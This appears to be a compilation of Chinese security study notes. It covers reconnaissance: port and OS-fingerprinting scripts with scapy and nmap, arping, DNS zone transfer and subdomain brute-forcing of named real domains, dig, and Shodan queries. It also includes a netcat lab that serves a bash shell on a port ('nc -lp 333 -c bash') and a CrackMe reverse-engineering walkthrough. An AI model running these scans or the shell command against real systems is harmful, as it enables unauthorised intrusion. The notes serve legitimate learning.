发现到存活的IP以后，那么下一步就是针对特定的主机进行端口扫描了，因为端口对应的是网络服务及其应用段的程序，一旦发现开放的端口，便可以借此进行渗透。假设ICMP 返回port-unreachable 响应代表端口关闭，但是如果目标系统不响应ICMP port-unreachable时，那么此端口可能处于开放状态 scapy端口扫描（基于UDP）#!/usr/bin/pythonimport loggingimport subprocesslogging.getLogger("scapy.runtime").setLevel(logging.ERROR)from scapy.all import *import time if len(sys.argv) != 4: print "Usage - ./udp_port.py [Target - TP] [First port] [Last port]" print "Usage - ./udp-port.py 128.13.34.13 1 100" sys.exit() ip = sys.argv[1]start = int(sys.argv[2])end = int(sys.argv[3]) for port in range(start,end): a = sr1(IP(dst=ip)/UDP(dport=port),timeout=5,verbose=0) time.sleep(1) if a == None: print port else: passnmap端口扫描（基于UDP）对特定ip端口扫描，如果不指定端口的话，namp默认会对1000常用端口进行扫描，即使是nmap如果是基于UDP的扫描话，也只是利用了UDP端口不可达的这一个特征信息，即返回一个ICMP不可达 nmap -sU 192.168.0.101指定端口扫描（-p53）： nmap -sU -p53 192.168.0.101指定端口范围进行扫描（-p53-80）： nmap -sU -p53-80 192.168.0.100 ...

OS的识别方法有多种，最简单的就是用TTL值去识别。不同类型的OS默认的起始TTL值是不同的，比如，windows的默认是128-65，然后每经过一个路由，TTL值减一。Linux/Unix的值是64，但有些特殊的Unix会是255 python脚本识别#!/usr/bin/python from scapy.all import *import logginglogging.getLogger("scapy.runtime").setLevel(logging.ERROR)import sys if len(sys.argv) != 2: print("Usage --/ttl_os.py [IP Address]") print("Example --/ttl_os.py 192.168.0.1") print("Example will preform ttl analysis to attempt to determine whether the system is windows or linux/unix") sys.exit() ip = sys.argv[1] ans = sr1(IP(dst=str(ip))/ICMP(), timeout=1, verbose=0)if ans == None: print("NO response was returned")elif int(ans[IP].ttl)<=64: print("Host is Linux/Unix")else: print("Host is Windows")nmap识别OSNMAP的-O参数可以进行OS的识别 nmap -O 192.168.0.1 基于网络监听的工作原理，Windows和Linux发送出来的包是有很大区别的。被动式的扫描可以部署在网络进出口的地方，目的是让所经过的流量通过我的流量分析器。在Kali中存在工具p0f，他会监听凡是通过本地网卡的流量。p0f不但会探测OS类型，同时也会对目标上面所运行的应用程序进行探测。

该命令用来向局域网内的其它主机发送ARP请求的指令，它可以用来测试局域网内的某个IP是否已被使用。 查看某IP的MAC地址： arping 192.168.1.106 加入参数-c，指定发包数量 这里指定了数量为1 ，所以自动就停下来了；如果制定的IP未被分配，显示如下内容： 由于没有主机向我返回，所以可以判断这个IP不存在 有一个参数可以判断是否存在arp欺骗：-d，这个参数作用是 ：Find duplicate replies. Exit with 1 if there  are  answers  from two different MAC addresses.意思是如果有来自两个不同MAC地址的arp响应，那么返回1，从数据链路层来看，对于一个MAC地址请求的响应只能有一个，有两个就说明出现了arp地址欺骗，通常是检查网关 用管道修剪一下显示内容： arping -c 3 192.。168.0.106 | grep “bytes from其中grep命令用于查找文件里符合条件的字符串 其他参数： -A：与-U参数类似，但是使用的是ARP REPLY包而非ARP REQUEST包。 -b：发送以太网广播帧，arping在开始时使用广播地址，在收到回复后使用unicast单播地址。 -c：发送指定的count个ARP REQUEST包后停止。如果指定了-w参数，则会等待相同数量的ARP REPLY包，直到超时为止。 -D：重复地址探测模式，用来检测有没有IP地址冲突，如果没有IP冲突则返回0。 -f：收到第一个响应包后退出。 -h：显示帮助页。 -I：用来发送ARP REQUEST包的网络设备的名称。 -q：quite模式，不显示输出。 -U：无理由的（强制的）ARP模式去更新别的主机上的ARP CACHE列表中的本机的信息，不需要响应。 -V：显示arping的版本号。 -w：指定一个超时时间，单位为秒，arping在到达指定时间后退出，无论期间发送或接收了多少包。在这种情况下，arping在发送完指定的count（-c）个包后并不会停止，而是等待到超时或发送的count个包都进行了回应后才会退出。 -s：设置发送ARP包的IP资源地址，如果为空，则按如下方式处理： 1、DAD模式（-D）设置为0.0.0.0； 2、Unsolicited模式（-U）设置为目标地址； 3、其它方式，从路由表计算。

区域传输，能够完成DNS服务器之间的数据库同步，一般只发生在DNS服务器之间，发生的情况可能是域名服务器的变动，比如增加或撤掉一些域名服务器。但是有些DNS服务器的系统管理员比较粗心，在配置时发生了一些小错误，导致任何一台主机都可以跟这台DNS服务器进行数据库同步。 进行区域传输，是为了列出当前域中的所有主机记录，然后可以推断出目标在网络上提供了什么服务 查一下sina.com的NS记录 随便选一个域名服务器，这里我选的是ns1.sina.com，尝试进行区域传输（@后面的内容是指定域名服务器，axfr是查询类型，即要求同步数据库） 其中-T：使用TCP/IP模式。-l：在域中列出所有的主机记录 如果区域传输失败了，为了实现目的，最常用的方法就是DNS字典爆破，即拿一个字典一个一个尝试，把对应的域名的解析记录全部暴力尝试出来，下面介绍几种字典爆破的命令： fierce (-dnssever：指定域名服务器，-dns：指定要查询的域名，-wordlist：指定字典) 由于我这里并没有a.txt这个字典，所以显示无法打开，为了找到这个命令对应的字典，执行如下命令： dpkg -L fierce 有个txt文件，刚才看了一下里面内容太多，现在查一下里面有没有www这种字符串，如果有的话，那就是字典了 找到了字典 ，然后准备爆破，命令如下： fierce -dnssever 8.8.8.8 -dns sina.com.cn -wordlist /usr/share/fierce/hosts.txtdnsenum（dnsenum -f 指定字典路径 要爆破的域名）（功能较全，重点掌握） dnsenum -f /usr/share/fierce/hosts.txt sina.com.cn这里偷了个懒，直接用了fierce的字典；事实上也可以搜索dnsenum软件包的文件： dpkg -L dnsenum 找到字典，用它爆破

摘要： A记录 ；NS记录； MX记录 ；CNAME记录 ；TXT记录 ；TTL值 ；PTR值 DNS：Domain Name System 域名管理系统 域名是由圆点分开一串单词或缩写组成的，每一个域名都对应一个惟一的IP地址，这一命名的方法或这样管理域名的系统叫做域名管理系统。DNS：Domain Name Server 域名服务器 域名虽然便于人们记忆，但网络中的计算机之间只能互相认识IP地址，它们之间的转换工作称为域名解析，域名解析需要由专门的域名解析服务器来完成，DNS 就是进行域名解析的服务器。 查看DNS更详细的解释A记录：A（Address）记录是用来指定主机名（或域名）对应的IP地址记录。用户可以将该域名下的网站服务器指向到自己的web server上。同时也可以设置域名的子域名。通俗来说A记录就是服务器的IP,域名绑定A记录就是告诉DNS,当你输入域名的时候给你引导向设置在DNS的A记录所对应的服务器。 简单的说，A记录是指定域名对应的IP地址。NS记录：NS（Name Server）记录是域名服务器记录，用来指定该域名由哪个DNS服务器来进行解析。 注册域名时，总有默认的DNS服务器，每个注册的域名都是由一个DNS域名服务器来进行解析的，DNS服务器NS记录地址一般以以下的形式出现： ns1.domain.com、ns2.domain.com等。 简单的说，NS记录是指定由哪个DNS服务器解析你的域名。MX记录：MX（Mail Exchanger）记录是邮件交换记录，它指向一个邮件服务器，用于电子邮件系统发邮件时根据收信人的地址后缀来定位邮件服务器。例如，当Internet上的某用户要发一封信给 user@mydomain.com 时，该用户的邮件系统通过DNS查找mydomain.com这个域名的MX记录，如果MX记录存在， 用户计算机就将邮件发送到MX记录所指定的邮件服务器上。CNAME记录：CNAME（Canonical Name ）别名记录，允许将多个名字映射到同一台计算机。通常用于同时提供WWW和MAIL服务的计算机。例如，有一台计算机名为 “host.mydomain.com”（A记录），它同时提供WWW和MAIL服务，为了便于用户访问服务。可以为该计算机设置两个别名（CNAME）：WWW和MAIL， 这两个别名的全称就“www.mydomain.com”和“mail.mydomain.com”，实际上他们都指向 “host.mydomain.com”。TXT记录：一般指某个主机名或域名的说明，如：admin IN TXT "管理员, 电话：XXXXXXXXXXX"，mail IN TXT "邮件主机，存放在xxx , 管理人：AAA"，Jim IN TXT "contact: abc@mailserver.com"，也就是您可以设置 TXT 内容以便使别人联系到您。 TXT的应用之一，SPF（Sender Policy Framework）反垃圾邮件。SPF是跟DNS相关的一项技术，它的内容写在DNS的TXT类型的记录里面。MX记录的作用是给寄信者指明某个域名的邮件服务器有哪些。SPF的作用跟MX相反，它向收信者表明，哪些邮件服务器是经过某个域名认可会发送邮件的。SPF的作用主要是反垃圾邮件，主要针对那些发信人伪造域名的垃圾邮件。例如：当邮件服务器收到自称发件人是spam@gmail.com的邮件，那么到底它是不是真的gmail.com的邮件服务器发过来的呢，我们可以查询gmail.com的SPF记录，以此防止别人伪造你来发邮件。TTL值：TTL（Time-To-Live）原理：TTL是IP协议包中的一个值，它告诉网络路由器包在网络中的时间是否太长而应被丢弃。有很多原因使包在一定时间内不能被传递到目的地。例如，不正确的路由表可能导致包的无限循环。一个解决方法就是在一段时间后丢弃这个包，然后给发送者一个报文，由发送者决定是否要重发。TTL的初值通常是系统缺省值，是包头中的8位的域。TTL的最初设想是确定一个时间范围，超过此时间就把包丢弃。由于每个路由器都至少要把TTL域减一，TTL通常表示包在被丢弃前最多能经过的路由器个数。当记数到0时，路由器决定丢弃该包，并发送一个ICMP报文给最初的发送者。 简单的说，TTL就是一条域名解析记录在DNS服务器中的存留时间。当各地的DNS服务器接受到解析请求时，就会向域名指定的NS服务器发出解析请求从而获得解析记录；在获得这个记录之后，记录会在DNS服务器中保存一段时间，这段时间内如果再接到这个域名的解析请求，DNS服务器将不再向NS服务器发出请求，而是直接返回刚才获得的记录，而这个记录在DNS服务器上保留的时间，就是TTL值。 TTL值设置的应用：一是增大TTL值，以节约域名解析时间，给网站访问加速。 一般情况下，域名的各种记录是极少更改的，很可能几个月、几年内都不会有什么变化。我们完全可以增大域名记录的TTL值让记录在各地DNS服务器中缓存的时间加长，这样在更长的一段时间内，我们访问这个网站时，本地ISP的DNS服务器就不需要向域名的NS服务器发出解析请求，而直接从缓存中返回域名解析记录。 二是减小TTL值，减少更换空间时的不可访问时间。 更换空间99.9%会有DNS记录更改的问题，因为缓存的问题，新的域名记录在有的地方可能生效了，但在有的地方可能等上一两天甚至更久才生效。结果就是有的人可能访问到了新服务器，有的人访问到了旧服务器。仅仅是访问的话，这也不是什么大问题，但如果涉及到了邮件发送，这个就有点麻烦了，说不定哪封重要信件就被发送到了那已经停掉的旧服务器上。 为了尽可能的减小这个各地的解析时间差，合理的做法是： 第一步，先查看域名当前的TTL值，我们假定是1天。 第二步，修改TTL值为可设定的最小值，可能的话，建议为1分钟，就是60。 第三步，等待一天，保证各地的DNS服务器缓存都过期并更新了记录。 第四步，设置修改新记录，这个时候各地的DNS就能以最快的速度更新到新的记录。 第五步，确认各地的DNS已经更新完成后，把TTL值设置成您想要的值。 一般操作系统的默认TTL值如下： TTL=32 Windows 9x/Me ，TTL=64 LINUX ，TTL=128 Windows 200x/XP， TTL=255 UnixPTR值：PTR是pointer的简写，用于将一个IP地址映射到对应的域名，也可以看成是A记录的反向，IP地址的反向解析。 PTR主要用于邮件服务器，比如邮箱AAA@XXX.com给邮箱BBB@yahoo.com发了一封邮件，yahoo邮件服务器接到邮件时会查看这封邮件的头文件，并分析是由哪个IP地址发出来的，然后根据这个IP地址进行反向解析，如果解析结果对应XXX.com的IP地址就接受这封邮件，反之则拒绝接收这封邮件。泛域名与泛解析：泛域名是指在一个域名根下，以 XXX.Domain.com的形式表示这个域名根所有未建立的子域名。 泛解析是把*.Domain.com的A记录解析到某个IP 地址上，通过访问任意的前缀.domain.com都能访问到你解析的站点上。域名绑定：域名绑定是指将域名指向服务器IP的操作。域名转向：域名转向又称为域名指向或域名转发，当用户地址栏中输入您的域名时，将会自动跳转到所指定的另一个域名。一般是使用短的好记的域名转向复杂难记的域名。

dig 命令主要用来从 DNS 域名服务器查询主机地址 首先介绍一下常见的DNS记录： dig mail.163.com指定DNS服务器dig @114.114.114.114 mail.163.com显示简要信息在终端中，如果简单的执行dig mai.163.com会发现显示的内容太多了，首先 dig +noall @8.8.8.8 mail.163.com发现并没有内容输出，原因是+noall的作用，然后 dig +noall +answer @8.8.8.8 mail.163.com输出内容为： 内容已经简要了不少了，为了复习一下管道，再加一点点缀： dig +noall +answer @8.8.8.8 mail.163.com | awk '{print $5}'其中awk '{print $5}'的作用是输出前面内容的第五列： 反向查询已知IP，求它对应的域名首先，查询163.com的MX记录： dig 163.com MX然后我最随便找一个域名dig一下它的IP，这里我选的是第一个： 随便找一个IP反向查询它的域名，这里我选的是第一个，注意参数是-x 这里看到查到的域名和上一张图片中的是对不上的，这是因为域名和IP相互之间的对应关系都可以是一对多的，所以查询结果也算是正确的

互联网上最可怕的搜索引擎，主要用于搜索联网的设备。Shodan是一个搜素互联网链接设备的搜索引擎，不同于Google、Baidu这些搜素引擎。用户可以在Shodan上使用Shodan搜索语法查找链接到互联网的摄像头、路由器、服务器等设备信息。 常用参数： hostname，搜索指定的主机或域名，例如 hostname:baiduport，搜索指定的端口或服务，例如 port:80country，搜索指定的国家，例如 country:UScity，搜索指定的城市，例如 city:Chengduorg，搜索指定的组织或公司，例如 org:"Google"isp，搜索指定的ISP供应商，例如 isp:"China Telecom"product，搜索指定的操作系统/软件/平台，例如 product:"Apache httpd"version，搜索指定的软件版本，例如 version:"1.6.2"geo，搜索指定的地理位置，参数为经纬度，例如 geo:"31.8639, 117.2808"before/after，搜索指定收录时间前后的数据，格式为dd-mm-yy，例如 before:"11-11-15"net，搜索指定的IP地址或子网，例如 net:"210.45.240.0/24"

首先更改两个虚拟机的网络连接方式 在Target机上，侦听333端口nc -lp 333 -c bash简单解释一下这条命令，在Target机上用侦听333端口，如果建立连接那么将Target机的shell传给主动建立连接的机器 在我的另一台机器中，启动wireshark开始抓包在这台机器中，主动连接Target的333端口，命令如下： nc -nv 192.168.x.y 333命令中包含了Target的IP，不要误解，此时wireshark抓到了数据包 执行了pwd指令，跟踪TCP数据流（nc建立在TCP连接之上），可以看到如下内容 那些点不知道是不是因为汉字的原因，英文的地方和终端中的显示是一致的。 显而易见，明文传输的最大弊端就在于此，通过嗅探内容很容易被看到

作者：逆向驿站微信公众号：逆向驿站知乎：逆向驿站CrackMe005,上篇说了具体方法，下篇来发逆向分析过程，看看老夫是如何得到上篇的具体方法的！准备【环境和工具】win7/xp虚拟机环境CrackMe005（ajj2.zip）ollydbgDededarkpeidUPXEasyGUI.exe(upx专用脱壳器)【学习层次】爆破，但是这个CM作者声明了，爆破他是不认可的解密流程，写注册机积累Delphi程序逆向特点经验详解视频搞清Delphi控件ID在反汇编代码中的特点，其实逻辑就清晰多了https://v.qq.com/x/page/x0830…实战图文一.DedeDark梳理事件、控件信息二.动态分析1.根据字符串定位总判断位置字符串“注册了”，“厉害厉害真佩服”入手，定位发现是timer2事件函数，五个判断不停的判断，如图可以看到判断跟6个值有关，分别是[ebx+304]、[ebx+308]、[ebx+310]、[ebx+318]、[ebx+314]、[ebx+31C],我们下文所有就对其简称做304、308、310、318、314、31C2.逐个判断层层分析我们从简单往复杂，并结合他们之间内在的逻辑先后顺序，去逐个分析，顺序分别是31C、304、308、310、314和318，其中最难的是310，方法是常量跟踪法，即在OD中点击 查找→所有常量 ，看看都那些地方对这些值有操作31C总判断目标：31C值，不能等于0x3E7相关事件函数：Button1Click最终逆向分析结论：Buton1Click事件不能被触发，否则31C就会被赋值0x3E7,即不能点击注册按钮，这里需要注意click事件和mousedown事件，click必须是一个按下和抬起的全过程，而且鼠标位置都在按钮控件范围内，而mousedwon事件按下就是具体逆向分析过程如下所有常量查找结果，如下反汇编代码如下呵呵就一行，确实简单吧304总判断目标：304值，不能等于0xC34相关事件函数：FormCreat最终逆向分析结论：FormCreat生成表单的事件函数中，会对一个固定路径检查是否有合规内容的合规文件，有则，显示出隐藏的Edit2控件具体逆向分析过程如下所有常量查找结果，如下反汇编代码如下注意：我这里已经把，CrackMe开发者要求的X盘符改为了C盘符，为的是方便308总判断目标：308值，不能等于0x230D相关事件函数：Button1MouseDown、Panel1DblClick最终逆向分析结论：308初始值是由FormCreat函数初始化为0x28E,在Button1MouseDown事件中，右键一次则308值增加0x3,最终目标是0x29D,因为等于0x29D后，Panel1DblClick事件就可以解禁Edit2控件，则0x29D减去0x28E再除以0x3最后结果等于5，即右键点击注册按钮5次，再去双击panel1控件没有图的地方，就可以解禁Edit2控件具体逆向分析过程如下所有常量查找结果，如下反汇编代码如下310 中嵌套 30C，最复杂的地方总判断目标：310值，必须等于0xF94相关事件函数：FormMouseMove、Edit2DblClick最终逆向分析结论：310的值要想最终被赋值0xF94,必须完成三重判断，第一个是当控件ID是0xE20时，即是image3"性相近"的时候，FormMouseMove捕捉的XY坐标都足够大，即右下脚，满足则310被赋值0x10,第二个是当控件ID是0x2DC时，即image2"性本善"的时候，FormMouseMove捕捉的X坐标足够小、Y坐标足够大，第三个是，30C不能等于初始值0x9, 30C被赋值的条件是Edit2中的字符串长度是8位，且第二位是"_"，第6位是"," ，我们写1_345,78是符合要求的，同时要求用户名长度是3的整数倍，然后左键双击Edit2控件，即可给30C赋值，具体赋值结果又跟你的磁盘剩余空间有关。当上面这一系列嵌套判断都合规后，则完成310赋值0xF94,同时若是用户名是"ajj"，则显示隐藏控件ID是0x2FC的Label3,显示值是30C具体逆向分析过程如下310所有常量查找结果，如下310反汇编代码如下发现嵌套30C，那么继续常量查找30C，如下30C反汇编代码如下这里其实是这个crackme最难的地方了，其实逻辑并不复杂，需要耐性和记录给理清晰即可314和318总判断目标：314的值等于318的值相关事件函数：image14MouseDown最终逆向分析结论：其实314的值在上一个流程中已经赋值完毕，314的值取决于30C的值，30C分别是0、1、2、3的时候，314分别是0x41、0x3D、0x34、0xDF，而318的值，则是点击14幅图片，区分左右键，分别自增不同的数值，具体如下方图片，最终要求318的值等于314的值具体逆向分析过程如下所有常量314查找结果，如下314反汇编代码如下318所有常量查找结果，如图至此，如下图timer2所有的总判断全部过关，所以timer2每次触发，都将走注册成功的流程，是不是感觉很刺激，跃跃欲试的，去网盘中下载，去折磨自己的吧文章中涉及软件、课件、源码等均在网盘，为避免网盘链接失效，公众号中回复：网盘欢迎关注微信公众号：逆向驿站相关文章● CrackMe-005精解（上）● CrackMe-004精解● CrackMe-003精解● CrackMe-002精解● CrackMe-001精解本期标签：dededark|delphi反汇编|crackme|crackme5|crackme05